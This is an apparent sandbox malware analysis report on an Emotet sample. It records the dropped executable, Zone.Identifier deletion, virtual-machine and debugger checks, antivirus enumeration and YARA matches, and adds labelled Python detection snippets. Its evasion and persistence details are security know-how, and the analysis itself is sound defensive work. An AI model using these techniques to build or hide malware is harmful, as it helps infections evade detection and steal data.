Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E778BE push ecx; mov dword ptr [esp], 0000C5A1h 0_2_02E778BF
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E7789E push ecx; mov dword ptr [esp], 00001F9Eh 0_2_02E7789F
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E7786E push ecx; mov dword ptr [esp], 00001CE1h 0_2_02E7786F
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E939D9 push ss; iretd 0_2_02E939DE
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E779AE push ecx; mov dword ptr [esp], 0000F5B3h 0_2_02E779AF
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E8858F push edi; iretd 0_2_02E885A1
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E7798E push ecx; mov dword ptr [esp], 0000AAF5h 0_2_02E7798F
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E7795E push ecx; mov dword ptr [esp], 000089FAh 0_2_02E7795F
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E7792E push ecx; mov dword ptr [esp], 0000B2E0h 0_2_02E7792F
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A75EA0 push ecx; mov dword ptr [esp], 0000A3FDh 3_2_02A75EA1
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A75D90 push ecx; mov dword ptr [esp], 0000B2E0h 3_2_02A75D91
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A75DF0 push ecx; mov dword ptr [esp], 0000AAF5h 3_2_02A75DF1
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A75EF0 push ecx; mov dword ptr [esp], 0000669Ch 3_2_02A75EF1
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A75DC0 push ecx; mov dword ptr [esp], 000089FAh 3_2_02A75DC1
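The push ecx; mov dword ptr [esp], imm32 pairs listed above open a stack slot with push ecx and then overwrite it with a small constant (0000AAF5h, 0000669Ch, ...), so the constant reaches the callee without a plain push imm32 that a pattern matcher would catch. The scanner below is an added example, not part of this report or of the sample: it finds that byte sequence (51 C7 04 24 imm32) in raw code bytes and recovers the immediates, and it also matches the mov eax, dword ptr fs:[30h] PEB read that this report lists under Anti Debugging. The code bytes it runs on are constructed inline from constants in the report; the call eax after each stub and the base address are assumptions used only to shape the sample.

```python
"""Locate two x86 idioms flagged in this report in raw code bytes (added example)."""
import re
import struct
from typing import List, Tuple

# 32-bit x86 encodings:
#   51                    push ecx
#   C7 04 24 imm32        mov dword ptr [esp], imm32   (overwrites the pushed ecx)
#   64 A1 30 00 00 00     mov eax, dword ptr fs:[30h]  (TEB -> PEB pointer)
PUSH_ECX_MOV_ESP = re.compile(rb"\x51\xC7\x04\x24(.{4})", re.DOTALL)
MOV_EAX_FS30 = re.compile(rb"\x64\xA1\x30\x00\x00\x00")


def find_pushed_constants(code: bytes, base: int = 0) -> List[Tuple[int, int]]:
    """Return (address, imm32) for each push ecx / mov [esp], imm32 pair."""
    return [(base + m.start(), struct.unpack("<I", m.group(1))[0])
            for m in PUSH_ECX_MOV_ESP.finditer(code)]


def find_peb_reads(code: bytes, base: int = 0) -> List[int]:
    """Return the address of each mov eax, fs:[30h]."""
    return [base + m.start() for m in MOV_EAX_FS30.finditer(code)]


def build_sample() -> bytes:
    """Constructed code bytes: three stubs using constants from the report,
    each followed by an assumed call eax (FF D0) and two NOPs, then a PEB read."""
    stubs = b""
    for imm in (0xAAF5, 0x669C, 0x89FA):
        stubs += b"\x51\xC7\x04\x24" + struct.pack("<I", imm) + b"\xFF\xD0\x90\x90"
    return stubs + b"\x64\xA1\x30\x00\x00\x00" + b"\xC3"  # ret


def report(code: bytes, base: int) -> List[str]:
    """Render findings in the report's own 'address idiom' style."""
    lines = [f"{addr:08X} push ecx; mov dword ptr [esp], {imm:08X}h"
             for addr, imm in find_pushed_constants(code, base)]
    lines += [f"{addr:08X} mov eax, dword ptr fs:[00000030h]"
              for addr in find_peb_reads(code, base)]
    return lines


if __name__ == "__main__":
    # Base address is an assumption; the report's 0_2_02EF5DF0 is used for illustration.
    for line in report(build_sample(), 0x02EF5DF0):
        print(line)
```

A linear byte scan can match inside the immediate of an unrelated instruction, so confirm each hit against a disassembler before treating it as a real stub; on the unpacked memory dumps the report names (0.2.FsWcL0gpTv.exe.2ef0000.1.unpack) the sequences recur at fixed spacing, which is the tell that they are compiler-generated thunks rather than chance byte overlap.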

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Executable created and started: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Jump to behavior
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe PE file moved: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe File opened: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe:Zone.Identifier read attributes | delete Jump to behavior
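The sample opens the dropped file's Zone.Identifier stream with delete access and removes it, which strips the mark-of-the-web that Windows and Defender use to treat a downloaded file with more suspicion than a locally created one. The snippet below is an added example, not part of this report: it parses the [ZoneTransfer] stream as a browser writes it, classifies the zone, and reads the stream off a file on NTFS (Windows only, since the stream is an NTFS alternate data stream). The sample stream content and its example.invalid URLs are constructed.

```python
"""Parse and check the Zone.Identifier alternate data stream (added example)."""
import sys
from typing import Dict, Optional

# URLMON zone identifiers: 0 local machine, 1 intranet, 2 trusted, 3 internet, 4 restricted.
ZONE_NAMES = {0: "LocalMachine", 1: "Intranet", 2: "Trusted", 3: "Internet", 4: "Restricted"}


def parse_zone_identifier(stream_text: str) -> Dict[str, str]:
    """Parse the INI-style [ZoneTransfer] section into key -> value."""
    values: Dict[str, str] = {}
    in_section = False
    for raw in stream_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[zonetransfer]"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            values[key.strip()] = value.strip()
    return values


def zone_of(stream_text: str) -> Optional[int]:
    """Numeric ZoneId, or None when the stream is absent or malformed."""
    zid = parse_zone_identifier(stream_text).get("ZoneId")
    return int(zid) if zid is not None and zid.isdigit() else None


def zone_name(stream_text: str) -> str:
    zid = zone_of(stream_text)
    return ZONE_NAMES.get(zid, "Unknown") if zid is not None else "NoMark"


def is_marked_from_internet(stream_text: str) -> bool:
    """Internet and Restricted zones are the ones SmartScreen/Defender act on."""
    return zone_of(stream_text) in (3, 4)


def read_mark_of_the_web(path: str) -> Optional[str]:
    """Return the raw stream text, or None if the file carries no Zone.Identifier.

    NTFS exposes alternate streams as path:StreamName. A dropper that deletes the
    stream (as this sample does) makes this return None, so absence of the mark is
    not evidence that the file was created locally.
    """
    if not sys.platform.startswith("win"):
        raise OSError("alternate data streams require NTFS on Windows")
    try:
        with open(path + ":Zone.Identifier", "r", encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except FileNotFoundError:
        return None


# Constructed sample stream in the form a browser writes it (URLs are placeholders).
SAMPLE_STREAM = (
    "[ZoneTransfer]\r\n"
    "ZoneId=3\r\n"
    "ReferrerUrl=https://example.invalid/\r\n"
    "HostUrl=https://example.invalid/download\r\n"
)

if __name__ == "__main__":
    print(zone_name(SAMPLE_STREAM), parse_zone_identifier(SAMPLE_STREAM))
```

For detection, the positive signal is not the stream's content but its removal: the report records the dropper opening WpPortingLibrary.exe:Zone.Identifier with "read attributes | delete" access, and a file-delete or open-for-delete event whose target ends in :Zone.Identifier, raised by a process that is not a browser or the user's own Unblock-File action, is the thing to alert on.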

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains functionality to enumerate running services
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap, 0_2_02EF5070
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\svchost.exe TID: 5356 Thread sleep time: -30000s >= -30000s Jump to behavior
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF38F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose, 0_2_02EF38F0
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A738F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,_snwprintf,FindClose,FindClose, 3_2_02A738F0
Source: svchost.exe, 00000004.00000002.501755488.0000017996C64000.00000004.00000001.sdmp Binary or memory string: "@Hyper-V RAW
Source: svchost.exe, 00000006.00000002.291934886.000001A7A3940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.501249467.0000027767140000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.309736997.0000027366290000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000004.00000002.500177833.000001799182A000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW`s
Source: svchost.exe, 00000001.00000002.494050614.0000020E88002000.00000004.00000001.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp, svchost.exe, 00000004.00000002.501721455.0000017996C57000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000006.00000002.291934886.000001A7A3940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.501249467.0000027767140000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.309736997.0000027366290000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000006.00000002.291934886.000001A7A3940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.501249467.0000027767140000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.309736997.0000027366290000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000007.00000002.500021852.0000027766466000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.500101123.0000021FB9C29000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000006.00000002.291934886.000001A7A3940000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.501249467.0000027767140000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.309736997.0000027366290000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EB1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError, 0_2_02EB1030
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF3F20 mov eax, dword ptr fs:[00000030h] 0_2_02EF3F20
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF4E20 mov eax, dword ptr fs:[00000030h] 0_2_02EF4E20
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E75ABE mov eax, dword ptr fs:[00000030h] 0_2_02E75ABE
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E70456 mov eax, dword ptr fs:[00000030h] 0_2_02E70456
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E769BE mov eax, dword ptr fs:[00000030h] 0_2_02E769BE
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02E7095E mov eax, dword ptr fs:[00000030h] 0_2_02E7095E
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EB1030 mov eax, dword ptr fs:[00000030h] 0_2_02EB1030
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A73F20 mov eax, dword ptr fs:[00000030h] 3_2_02A73F20
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A74E20 mov eax, dword ptr fs:[00000030h] 3_2_02A74E20
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_029F5ABE mov eax, dword ptr fs:[00000030h] 3_2_029F5ABE
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_029F0456 mov eax, dword ptr fs:[00000030h] 3_2_029F0456
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_029F69BE mov eax, dword ptr fs:[00000030h] 3_2_029F69BE
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_029F095E mov eax, dword ptr fs:[00000030h] 3_2_029F095E
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A31030 mov eax, dword ptr fs:[00000030h] 3_2_02A31030
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF38F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose, 0_2_02EF38F0
Source: WpPortingLibrary.exe, 00000003.00000002.500511133.00000000015E0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: WpPortingLibrary.exe, 00000003.00000002.500511133.00000000015E0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: WpPortingLibrary.exe, 00000003.00000002.500511133.00000000015E0000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: WpPortingLibrary.exe, 00000003.00000002.500511133.00000000015E0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
Source: WpPortingLibrary.exe, 00000003.00000002.500511133.00000000015E0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe Code function: 0_2_02EF7EC0 _snwprintf,GetProcessHeap,SetFileInformationByHandle,SetFileInformationByHandle,GetSystemTimeAsFileTime,CreateFileW,CreateFileW,CloseHandle, 0_2_02EF7EC0
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Code function: 3_2_02A75360 RtlGetVersion,GetNativeSystemInfo,GetNativeSystemInfo, 3_2_02A75360
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
AV process strings found (often used to terminate AV products)
Source: svchost.exe, 0000000B.00000002.500285558.000001C4ACF02000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000B.00000002.500208898.000001C4ACE3D000.00000004.00000001.sdmp Binary or memory string: \REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match File source: 00000000.00000002.238986600.0000000002EB4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.500653398.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.239016780.0000000002EF1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.500762111.0000000002A34000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.238943742.0000000002E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.500809704.0000000002A71000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.FsWcL0gpTv.exe.2ef0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.WpPortingLibrary.exe.2a70000.1.unpack, type: UNPACKEDPE